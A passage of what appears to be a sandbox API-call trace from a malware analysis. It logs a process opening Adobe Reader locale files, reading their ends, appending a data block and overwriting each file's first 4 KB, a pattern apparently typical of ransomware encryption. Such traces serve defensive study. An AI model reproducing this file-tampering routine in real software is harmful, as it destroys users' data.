10.0\\reader\\locale\\tr_tr\\brdlang32.tur"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0085.270] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0085.271] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x3400 [0085.272] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0085.272] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.273] ReleaseMutex (hMutex=0x168) returned 1 [0085.273] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BRdlang32.TUR", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0085.273] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BRdlang32.TUR", cchWideChar=13, lpMultiByteStr=0x1f7366c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BRdlang32.TUR", lpUsedDefaultChar=0x0) returned 13 [0085.274] ReadFile (in: hFile=0x1f0, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.280] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x2400 [0085.280] ReadFile (in: hFile=0x1f0, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.280] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x2400 [0085.281] WriteFile (in: hFile=0x1f0, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.281] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0085.281] WriteFile (in: hFile=0x1f0, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x2e9f28c*=0x1000, lpOverlapped=0x0) returned 1 [0085.281] CloseHandle (hObject=0x1f0) returned 1 [0085.281] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\tr_TR\\Multimedia.TUR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\tr_tr\\multimedia.tur"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0085.282] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0085.282] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x12e00 [0085.282] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0085.282] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.283] ReleaseMutex (hMutex=0x168) returned 1 [0085.283] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Multimedia.TUR", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0085.283] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Multimedia.TUR", cchWideChar=14, lpMultiByteStr=0x1f735ac, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Multimedia.TUR", lpUsedDefaultChar=0x0) returned 14 [0085.283] ReadFile (in: hFile=0x1f0, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2e9f278*=0x4000, lpOverlapped=0x0) returned 1 [0085.285] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x11e00 [0085.285] ReadFile (in: hFile=0x1f0, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.286] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x11e00 [0085.286] WriteFile (in: hFile=0x1f0, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.287] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0085.287] WriteFile (in: hFile=0x1f0, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2e9f28c*=0x4000, lpOverlapped=0x0) returned 1 [0085.287] CloseHandle (hObject=0x1f0) returned 1 [0085.288] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\tr_TR\\SendMail.TUR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\tr_tr\\sendmail.tur"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0085.288] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0085.288] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x3c00 [0085.288] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0085.288] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.288] ReleaseMutex (hMutex=0x168) returned 1 [0085.289] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SendMail.TUR", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.289] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SendMail.TUR", cchWideChar=12, lpMultiByteStr=0x1f7342c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SendMail.TUR", lpUsedDefaultChar=0x0) returned 12 [0085.289] ReadFile (in: hFile=0x1f0, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.290] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x2c00 [0085.291] ReadFile (in: hFile=0x1f0, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.291] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x2c00 [0085.291] WriteFile (in: hFile=0x1f0, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.292] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0085.292] WriteFile (in: hFile=0x1f0, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x2e9f28c*=0x1000, lpOverlapped=0x0) returned 1 [0085.292] CloseHandle (hObject=0x1f0) returned 1 [0085.292] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\uk_UA\\AdobeCollabSync.UKR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\uk_ua\\adobecollabsync.ukr"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0085.293] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0085.293] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x1a00 [0085.293] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0085.293] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.293] ReleaseMutex (hMutex=0x168) returned 1 [0085.293] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeCollabSync.UKR", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0085.294] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeCollabSync.UKR", cchWideChar=19, lpMultiByteStr=0x1f88c44, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdobeCollabSync.UKR", lpUsedDefaultChar=0x0) returned 19 [0085.294] ReadFile (in: hFile=0x1f0, lpBuffer=0x1e93878, nNumberOfBytesToRead=0x1a00, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesRead=0x2e9f2bc*=0x1a00, lpOverlapped=0x0) returned 1 [0085.386] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0085.386] WriteFile (in: hFile=0x1f0, lpBuffer=0x2665868*, nNumberOfBytesToWrite=0x1f88, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2665868*, lpNumberOfBytesWritten=0x2e9f2d0*=0x1f88, lpOverlapped=0x0) returned 1 [0085.386] CloseHandle (hObject=0x1f0) returned 1 [0085.386] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\uk_UA\\IA32.UKR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\uk_ua\\ia32.ukr"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0085.387] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0085.387] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xe00 [0085.388] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0085.388] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.388] ReleaseMutex (hMutex=0x168) returned 1 [0085.388] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IA32.UKR", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0085.388] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IA32.UKR", cchWideChar=8, lpMultiByteStr=0x1f7328c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IA32.UKR", lpUsedDefaultChar=0x0) returned 8 [0085.388] ReadFile (in: hFile=0x1f0, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0xe00, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2e9f2bc*=0xe00, lpOverlapped=0x0) returned 1 [0085.390] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0085.390] WriteFile (in: hFile=0x1f0, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1388, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x2e9f2d0*=0x1388, lpOverlapped=0x0) returned 1 [0085.391] CloseHandle (hObject=0x1f0) returned 1 [0085.391] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\uk_UA\\SaveAsRTF.UKR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\uk_ua\\saveasrtf.ukr"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0085.392] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0085.392] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x4a00 [0085.393] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0085.393] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.393] ReleaseMutex (hMutex=0x168) returned 1 [0085.393] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SaveAsRTF.UKR", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0085.393] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SaveAsRTF.UKR", cchWideChar=13, lpMultiByteStr=0x1f735ac, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SaveAsRTF.UKR", lpUsedDefaultChar=0x0) returned 13 [0085.393] ReadFile (in: hFile=0x1f0, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.396] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x3a00 [0085.396] ReadFile (in: hFile=0x1f0, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.396] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x3a00 [0085.396] WriteFile (in: hFile=0x1f0, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.397] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0085.397] WriteFile (in: hFile=0x1f0, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2e9f28c*=0x1000, lpOverlapped=0x0) returned 1 [0085.397] CloseHandle (hObject=0x1f0) returned 1 [0085.398] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\accessibility.CHS" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\zh_cn\\accessibility.chs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0085.398] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0085.399] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x6e00 [0085.399] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0085.399] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.399] ReleaseMutex (hMutex=0x168) returned 1 [0085.399] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="accessibility.CHS", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0085.399] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="accessibility.CHS", cchWideChar=17, lpMultiByteStr=0x1f88c44, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="accessibility.CHS", lpUsedDefaultChar=0x0) returned 17 [0085.399] ReadFile (in: hFile=0x1f0, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.402] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x5e00 [0085.402] ReadFile (in: hFile=0x1f0, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.402] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x5e00 [0085.403] WriteFile (in: hFile=0x1f0, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.403] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0085.404] WriteFile (in: hFile=0x1f0, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2e9f28c*=0x1000, lpOverlapped=0x0) returned 1 [0085.404] CloseHandle (hObject=0x1f0) returned 1 [0085.404] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\eBook.CHS" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\zh_cn\\ebook.chs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0085.405] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0085.405] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x1600 [0085.405] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0085.406] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.406] ReleaseMutex (hMutex=0x168) returned 1 [0085.406] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eBook.CHS", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0085.406] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eBook.CHS", cchWideChar=9, lpMultiByteStr=0x1f735ac, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eBook.CHS", lpUsedDefaultChar=0x0) returned 9 [0085.406] ReadFile (in: hFile=0x1f0, lpBuffer=0x1e93878, nNumberOfBytesToRead=0x1600, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesRead=0x2e9f2bc*=0x1600, lpOverlapped=0x0) returned 1 [0085.408] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0085.409] WriteFile (in: hFile=0x1f0, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1b88, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x2e9f2d0*=0x1b88, lpOverlapped=0x0) returned 1 [0085.409] CloseHandle (hObject=0x1f0) returned 1 [0085.409] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\ReadOutLoud.CHS" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\zh_cn\\readoutloud.chs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0085.410] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0085.410] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x2200 [0085.410] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0085.410] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.411] ReleaseMutex (hMutex=0x168) returned 1 [0085.411] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReadOutLoud.CHS", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0085.411] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReadOutLoud.CHS", cchWideChar=15, lpMultiByteStr=0x1f7328c, cbMultiByte=15, 